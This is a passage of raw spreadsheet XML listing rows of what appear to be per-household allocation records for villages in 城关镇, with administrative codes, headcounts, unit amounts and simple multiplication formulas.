      <c r="D425" s="16" t="s">
        <v>1244</v>
      </c>
      <c r="E425" s="16" t="s">
        <v>1245</v>
      </c>
      <c r="F425" s="17" t="str">
        <f>F424</f>
        <v>4113210106</v>
      </c>
      <c r="G425" s="17"/>
      <c r="H425" s="17"/>
      <c r="I425" s="17"/>
      <c r="J425" s="17"/>
      <c r="K425" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="426" customHeight="1" spans="1:11">
      <c r="A426" s="16" t="s">
        <v>1246</v>
      </c>
      <c r="B426" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C426" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D426" s="17" t="s">
        <v>1247</v>
      </c>
      <c r="E426" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F426" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G426" s="17">
        <v>2</v>
      </c>
      <c r="H426" s="18">
        <v>325</v>
      </c>
      <c r="I426" s="17">
        <f>H426*G426</f>
        <v>650</v>
      </c>
      <c r="J426" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K426" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="427" customHeight="1" spans="1:11">
      <c r="A427" s="16" t="s">
        <v>1248</v>
      </c>
      <c r="B427" s="17" t="str">
        <f>B426</f>
        <v>城关镇</v>
      </c>
      <c r="C427" s="17" t="str">
        <f>C426</f>
        <v>中华村</v>
      </c>
      <c r="D427" s="16" t="s">
        <v>1249</v>
      </c>
      <c r="E427" s="16" t="s">
        <v>1250</v>
      </c>
      <c r="F427" s="17" t="str">
        <f>F426</f>
        <v>4113210108</v>
      </c>
      <c r="G427" s="17"/>
      <c r="H427" s="17"/>
      <c r="I427" s="17"/>
      <c r="J427" s="17"/>
      <c r="K427" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="428" customHeight="1" spans="1:11">
      <c r="A428" s="16" t="s">
        <v>1251</v>
      </c>
      <c r="B428" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C428" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D428" s="17" t="s">
        <v>1252</v>
      </c>
      <c r="E428" s="17" t="s">
        <v>910</v>
      </c>
      <c r="F428" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G428" s="17">
        <v>1</v>
      </c>
      <c r="H428" s="18">
        <v>365</v>
      </c>
      <c r="I428" s="17">
        <f t="shared" ref="I428:I438" si="16">H428*G428</f>
        <v>365</v>
      </c>
      <c r="J428" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K428" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="429" customHeight="1" spans="1:11">
      <c r="A429" s="16" t="s">
        <v>1253</v>
      </c>
      <c r="B429" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C429" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D429" s="17" t="s">
        <v>1255</v>
      </c>
      <c r="E429" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F429" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G429" s="17">
        <v>1</v>
      </c>
      <c r="H429" s="18">
        <v>365</v>
      </c>
      <c r="I429" s="17">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J429" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K429" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="430" customHeight="1" spans="1:11">
      <c r="A430" s="16" t="s">
        <v>1256</v>
      </c>
      <c r="B430" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C430" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D430" s="17" t="s">
        <v>1257</v>
      </c>
      <c r="E430" s="17" t="s">
        <v>1258</v>
      </c>
      <c r="F430" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G430" s="17">
        <v>1</v>
      </c>
      <c r="H430" s="18">
        <v>365</v>
      </c>
      <c r="I430" s="17">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J430" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K430" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="431" customHeight="1" spans="1:11">
      <c r="A431" s="16" t="s">
        <v>1259</v>
      </c>
      <c r="B431" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C431" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D431" s="17" t="s">
        <v>1260</v>
      </c>
      <c r="E431" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F431" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G431" s="17">
        <v>1</v>
      </c>
      <c r="H431" s="18">
        <v>365</v>
      </c>
      <c r="I431" s="17">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J431" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K431" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="432" customHeight="1" spans="1:11">
      <c r="A432" s="16" t="s">
        <v>1261</v>
      </c>
      <c r="B432" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C432" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D432" s="17" t="s">
        <v>1262</v>
      </c>
      <c r="E432" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F432" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G432" s="17">
        <v>1</v>
      </c>
      <c r="H432" s="18">
        <v>365</v>
      </c>
      <c r="I432" s="17">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J432" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K432" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="433" customHeight="1" spans="1:11">
      <c r="A433" s="16" t="s">
        <v>1263</v>
      </c>
      <c r="B433" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C433" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D433" s="17" t="s">
        <v>1264</v>
      </c>
      <c r="E433" s="17" t="s">
        <v>1265</v>
      </c>
      <c r="F433" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G433" s="17">
        <v>2</v>
      </c>
      <c r="H433" s="18">
        <v>325</v>
      </c>
      <c r="I433" s="17">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J433" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K433" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="434" customHeight="1" spans="1:11">
      <c r="A434" s="16" t="s">
        <v>1266</v>
      </c>
      <c r="B434" s="17" t="str">
        <f>B433</f>
        <v>城关镇</v>
      </c>
      <c r="C434" s="17" t="str">
        <f>C433</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D434" s="16" t="s">
        <v>1267</v>
      </c>
      <c r="E434" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F434" s="17" t="str">
        <f>F433</f>
        <v>4113210103</v>
      </c>
      <c r="G434" s="17"/>
      <c r="H434" s="17"/>
      <c r="I434" s="17"/>
      <c r="J434" s="17"/>
      <c r="K434" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="435" customHeight="1" spans="1:11">
      <c r="A435" s="16" t="s">
        <v>1268</v>
      </c>
      <c r="B435" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C435" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D435" s="17" t="s">
        <v>1269</v>
      </c>
      <c r="E435" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F435" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G435" s="17">
        <v>1</v>
      </c>
      <c r="H435" s="18">
        <v>365</v>
      </c>
      <c r="I435" s="17">
        <f t="shared" ref="I435:I446" si="17">H435*G435</f>
        <v>365</v>
      </c>
      <c r="J435" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K435" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="436" customHeight="1" spans="1:11">
      <c r="A436" s="16" t="s">
        <v>1270</v>
      </c>
      <c r="B436" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C436" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D436" s="17" t="s">
        <v>1271</v>
      </c>
      <c r="E436" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F436" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G436" s="17">
        <v>1</v>
      </c>
      <c r="H436" s="18">
        <v>365</v>
      </c>
      <c r="I436" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J436" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K436" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="437" customHeight="1" spans="1:11">
      <c r="A437" s="16" t="s">
        <v>1272</v>
      </c>
      <c r="B437" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C437" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D437" s="17" t="s">
        <v>1274</v>
      </c>
      <c r="E437" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F437" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G437" s="17">
        <v>1</v>
      </c>
      <c r="H437" s="18">
        <v>365</v>
      </c>
      <c r="I437" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J437" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K437" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="438" customHeight="1" spans="1:11">
      <c r="A438" s="16" t="s">
        <v>1275</v>
      </c>
      <c r="B438" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C438" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D438" s="17" t="s">
        <v>1276</v>
      </c>
      <c r="E438" s="17" t="s">
        <v>1277</v>
      </c>
      <c r="F438" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G438" s="17">
        <v>1</v>
      </c>
      <c r="H438" s="18">
        <v>365</v>
      </c>
      <c r="I438" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J438" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K438" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="439" customHeight="1" spans="1:11">
      <c r="A439" s="16" t="s">
        <v>1278</v>
      </c>
      <c r="B439" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C439" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D439" s="17" t="s">
        <v>1279</v>
      </c>
      <c r="E439" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F439" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G439" s="17">
        <v>1</v>
      </c>
      <c r="H439" s="18">
        <v>365</v>
      </c>
      <c r="I439" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J439" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K439" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="440" customHeight="1" spans="1:11">
      <c r="A440" s="16" t="s">
        <v>1280</v>
      </c>
      <c r="B440" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C440" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D440" s="17" t="s">
        <v>1281</v>
      </c>
      <c r="E440" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F440" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G440" s="17">
        <v>1</v>
      </c>
      <c r="H440" s="18">
        <v>365</v>
      </c>
      <c r="I440" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J440" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K440" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="441" customHeight="1" spans="1:11">
      <c r="A441" s="16" t="s">
        <v>1282</v>
      </c>
      <c r="B441" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C441" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D441" s="17" t="s">
        <v>1283</v>
      </c>
      <c r="E441" s="17" t="s">
        <v>1284</v>
      </c>
      <c r="F441" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G441" s="17">
        <v>1</v>
      </c>
      <c r="H441" s="18">
        <v>365</v>
      </c>
      <c r="I441" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J441" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K441" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="442" customHeight="1" spans="1:11">
      <c r="A442" s="16" t="s">
        <v>1285</v>
      </c>
      <c r="B442" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C442" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D442" s="17" t="s">
        <v>1286</v>
      </c>
      <c r="E442" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F442" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G442" s="17">
        <v>1</v>
      </c>
      <c r="H442" s="18">
        <v>365</v>
      </c>
      <c r="I442" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J442" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K442" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="443" customHeight="1" spans="1:11">
      <c r="A443" s="16" t="s">
        <v>1287</v>
      </c>
      <c r="B443" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C443" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D443" s="17" t="s">
        <v>1288</v>
      </c>
      <c r="E443" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F443" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G443" s="17">
        <v>1</v>
      </c>
      <c r="H443" s="18">
        <v>365</v>
      </c>
      <c r="I443" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J443" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K443" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="444" customHeight="1" spans="1:11">
      <c r="A444" s="16" t="s">
        <v>1289</v>
      </c>
      <c r="B444" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C444" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D444" s="17" t="s">
        <v>1290</v>
      </c>
      <c r="E444" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F444" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G444" s="17">
        <v>1</v>
      </c>
      <c r="H444" s="18">
        <v>365</v>
      </c>
      <c r="I444" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J444" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K444" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="445" customHeight="1" spans="1:11">
      <c r="A445" s="16" t="s">
        <v>1291</v>
      </c>
      <c r="B445" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C445" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D445" s="17" t="s">
        <v>1292</v>
      </c>
      <c r="E445" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F445" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G445" s="17">
        <v>1</v>
      </c>
      <c r="H445" s="18">
        <v>365</v>
      </c>
      <c r="I445" s="17">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J445" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K445" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="446" customHeight="1" spans="1:11">
      <c r="A446" s="16" t="s">
        <v>1293</v>
      </c>
      <c r="B446" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C446" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D446" s="17" t="s">
        <v>1294</v>
      </c>
      <c r="E446" s="17" t="s">
        <v>545</v>
      </c>
      <c r="F446" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G446" s="17">
        <v>2</v>
      </c>
      <c r="H446" s="18">
        <v>325</v>
      </c>
      <c r="I446" s="17">
        <f t="shared" si="17"/>
        <v>650</v>
      </c>
      <c r="J446" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K446" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="447" customHeight="1" spans="1:11">
      <c r="A447" s="16" t="s">
        <v>1295</v>
      </c>
      <c r="B447" s="17" t="str">
        <f>B446</f>
        <v>城关镇</v>
      </c>
      <c r="C447" s="17" t="str">
        <f>C446</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D447" s="16" t="s">
        <v>1296</v>
      </c>
      <c r="E447" s="16" t="s">
        <v>1297</v>
      </c>
      <c r="F447" s="17" t="str">
        <f>F446</f>
        <v>4113210108</v>
      </c>
      <c r="G447" s="17"/>
      <c r="H447" s="17"/>
      <c r="I447" s="17"/>
      <c r="J447" s="17"/>
      <c r="K447" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="448" customHeight="1" spans="1:11">
      <c r="A448" s="16" t="s">
        <v>1298</v>
      </c>
      <c r="B448" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C448" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D448" s="17" t="s">
        <v>1299</v>
      </c>
      <c r="E448" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F448" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G448" s="17">
        <v>1</v>
      </c>
      <c r="H448" s="18">
        <v>365</v>
      </c>
      <c r="I448" s="17">
        <f>H448*G448</f>
        <v>365</v>
      </c>
      <c r="J448" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K448" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="449" customHeight="1" spans="1:11">
      <c r="A449" s="16" t="s">
        <v>1300</v>
      </c>
      <c r="B449" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C449" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D449" s="17" t="s">
        <v>1301</v>
      </c>
      <c r="E449" s="17" t="s">
        <v>1302</v>
      </c>
      <c r="F449" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G449" s="17">
        <v>1</v>
      </c>
      <c r="H449" s="18">
        <v>365</v>
      </c>
      <c r="I449" s="17">
        <f>H449*G449</f>
        <v>365</v>
      </c>
      <c r="J449" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K449" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="450" customHeight="1" spans="1:11">
      <c r="A450" s="16" t="s">
        <v>1303</v>
      </c>
      <c r="B450" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C450" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D450" s="17" t="s">
        <v>1304</v>
      </c>
      <c r="E450" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F450" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G450" s="17">
        <v>1</v>
      </c>
      <c r="H450" s="18">
        <v>365</v>
      </c>
      <c r="I450" s="17">
        <f>H450*G450</f>
        <v>365</v>
      </c>
      <c r="J450" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K450" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="451" customHeight="1" spans="1:11">
      <c r="A451" s="16" t="s">
        <v>1305</v>
      </c>
      <c r="B451" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C451" s="17" t="s">
        <v>1306</v>
      </c>
      <c r="D451" s="17" t="s">
        <v>1307</v>
      </c>
      <c r="E451" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F451" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G451" s="17">
        <v>2</v>
      </c>
      <c r="H451" s="18">
        <v>325</v>
      </c>
      <c r="I451" s="17">
        <f>H451*G451</f>
        <v>650</v>
      </c>
      <c r="J451" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K451" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="452" customHeight="1" spans="1:11">
      <c r="A452" s="16" t="s">
        <v>1308</v>
      </c>
      <c r="B452" s="17" t="str">
        <f>B451</f>
        <v>城关镇</v>
      </c>
      <c r="C452" s="17" t="str">
        <f>C451</f>
        <v>城关北外村</v>
      </c>
      <c r="D452" s="16" t="s">
        <v>1309</v>
      </c>
      <c r="E452" s="16" t="s">
        <v>1310</v>
      </c>
      <c r="F452" s="17" t="str">
        <f>F451</f>
        <v>4113210102</v>
      </c>
      <c r="G452" s="17"/>
      <c r="H452" s="17"/>
      <c r="I452" s="17"/>
      <c r="J452" s="17"/>
      <c r="K452" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="453" customHeight="1" spans="1:11">
      <c r="A453" s="16" t="s">
        <v>1311</v>
      </c>
      <c r="B453" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C453" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D453" s="17" t="s">
        <v>1312</v>
      </c>
      <c r="E453" s="17" t="s">
        <v>242</v>
      </c>
      <c r="F453" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G453" s="17">
        <v>2</v>
      </c>
      <c r="H453" s="18">
        <v>325</v>
      </c>
      <c r="I453" s="17">
        <f>H453*G453</f>
        <v>650</v>
      </c>
      <c r="J453" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K453" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="454" customHeight="1" spans="1:11">
      <c r="A454" s="16" t="s">
        <v>1313</v>
      </c>
      <c r="B454" s="17" t="str">
        <f>B453</f>
        <v>城关镇</v>
      </c>
      <c r="C454" s="17" t="str">
        <f>C453</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D454" s="16" t="s">
        <v>1314</v>
      </c>
      <c r="E454" s="16" t="s">
        <v>1315</v>
      </c>
      <c r="F454" s="17" t="str">
        <f>F453</f>
        <v>4113210108</v>
      </c>
      <c r="G454" s="17"/>
      <c r="H454" s="17"/>
      <c r="I454" s="17"/>
      <c r="J454" s="17"/>
      <c r="K454" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="455" customHeight="1" spans="1:11">
      <c r="A455" s="16" t="s">
        <v>1316</v>
      </c>
      <c r="B455" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C455" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D455" s="17" t="s">
        <v>1317</v>
      </c>
      <c r="E455" s="17" t="s">
        <v>360</v>
      </c>
      <c r="F455" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G455" s="17">
        <v>1</v>
      </c>
      <c r="H455" s="18">
        <v>365</v>
      </c>
      <c r="I455" s="17">
        <f t="shared" ref="I455:I463" si="18">H455*G455</f>
        <v>365</v>
      </c>
      <c r="J455" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K455" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="456" customHeight="1" spans="1:11">
      <c r="A456" s="16" t="s">
        <v>1318</v>
      </c>
      <c r="B456" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C456" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D456" s="17" t="s">
        <v>1319</v>
      </c>
      <c r="E456" s="17" t="s">
        <v>1320</v>
      </c>
      <c r="F456" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G456" s="17">
        <v>1</v>
      </c>
      <c r="H456" s="18">
        <v>365</v>
      </c>
      <c r="I456" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J456" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K456" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="457" customHeight="1" spans="1:11">
      <c r="A457" s="16" t="s">
        <v>1321</v>
      </c>
      <c r="B457" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C457" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D457" s="17" t="s">
        <v>1322</v>
      </c>
      <c r="E457" s="17" t="s">
        <v>1323</v>
      </c>
      <c r="F457" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G457" s="17">
        <v>1</v>
      </c>
      <c r="H457" s="18">
        <v>365</v>
      </c>
      <c r="I457" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J457" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K457" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="458" customHeight="1" spans="1:11">
      <c r="A458" s="16" t="s">
        <v>1324</v>
      </c>
      <c r="B458" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C458" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D458" s="17" t="s">
        <v>1325</v>
      </c>
      <c r="E458" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F458" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G458" s="17">
        <v>1</v>
      </c>
      <c r="H458" s="18">
        <v>365</v>
      </c>
      <c r="I458" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J458" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K458" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="459" customHeight="1" spans="1:11">
      <c r="A459" s="16" t="s">
        <v>1326</v>
      </c>
      <c r="B459" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C459" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D459" s="17" t="s">
        <v>1327</v>
      </c>
      <c r="E459" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F459" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G459" s="17">
        <v>1</v>
      </c>
      <c r="H459" s="18">
        <v>365</v>
      </c>
      <c r="I459" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J459" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K459" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="460" customHeight="1" spans="1:11">
      <c r="A460" s="16" t="s">
        <v>1328</v>
      </c>
      <c r="B460" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C460" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D460" s="17" t="s">
        <v>1329</v>
      </c>
      <c r="E460" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F460" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G460" s="17">
        <v>1</v>
      </c>
      <c r="H460" s="18">
        <v>365</v>
      </c>
      <c r="I460" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J460" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K460" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="461" customHeight="1" spans="1:11">
      <c r="A461" s="16" t="s">
        <v>1330</v>
      </c>
      <c r="B461" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C461" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D461" s="17" t="s">
        <v>1331</v>
      </c>
      <c r="E461" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F461" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G461" s="17">
        <v>1</v>
      </c>
      <c r="H461" s="18">
        <v>365</v>
      </c>
      <c r="I461" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J461" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K461" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="462" customHeight="1" spans="1:11">
      <c r="A462" s="16" t="s">
        <v>1332</v>
      </c>
      <c r="B462" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C462" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D462" s="17" t="s">
        <v>1333</v>
      </c>
      <c r="E462" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F462" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G462" s="17">
        <v>1</v>
      </c>
      <c r="H462" s="18">
        <v>365</v>
      </c>
      <c r="I462" s="17">
        <f t="shared" si="18"/>
        <v>365</v>
      </c>
      <c r="J462" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K462" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="463" customHeight="1" spans="1:11">
      <c r="A463" s="16" t="s">
        <v>1334</v>
      </c>
      <c r="B463" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C463" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D463" s="17" t="s">
        <v>1335</v>
      </c>
      <c r="E463" s="17" t="s">
        <v>1336</v>
      </c>
      <c r="F463" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G463" s="17">
        <v>2</v>
      </c>
      <c r="H463" s="18">
        <v>325</v>
      </c>
      <c r="I463" s="17">
        <f t="shared" si="18"/>
        <v>650</v>
      </c>
      <c r="J463" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K463" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="464" customHeight="1" spans="1:11">
      <c r="A464" s="16" t="s">
        <v>1337</v>
      </c>
      <c r="B464" s="17" t="str">
        <f>B463</f>
        <v>城关镇</v>
      </c>
      <c r="C464" s="17" t="str">
        <f>C463</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D464" s="16" t="s">
        <v>1338</v>
      </c>
      <c r="E464" s="16" t="s">
        <v>288</v>
      </c>
      <c r="F464" s="17" t="str">
        <f>F463</f>
        <v>4113210108</v>
      </c>
      <c r="G464" s="17"/>
      <c r="H464" s="17"/>
      <c r="I464" s="17"/>
      <c r="J464" s="17"/>
      <c r="K464" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="465" customHeight="1" spans="1:11">
      <c r="A465" s="16" t="s">
        <v>1339</v>
      </c>
      <c r="B465" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C465" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D465" s="17" t="s">
        <v>1340</v>
      </c>
      <c r="E465" s="17" t="s">
        <v>1341</v>
      </c>
      <c r="F465" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G465" s="17">
        <v>1</v>
      </c>
      <c r="H465" s="18">
        <v>365</v>
      </c>
      <c r="I465" s="17">
        <f t="shared" ref="I465:I493" si="19">H465*G465</f>
        <v>365</v>
      </c>
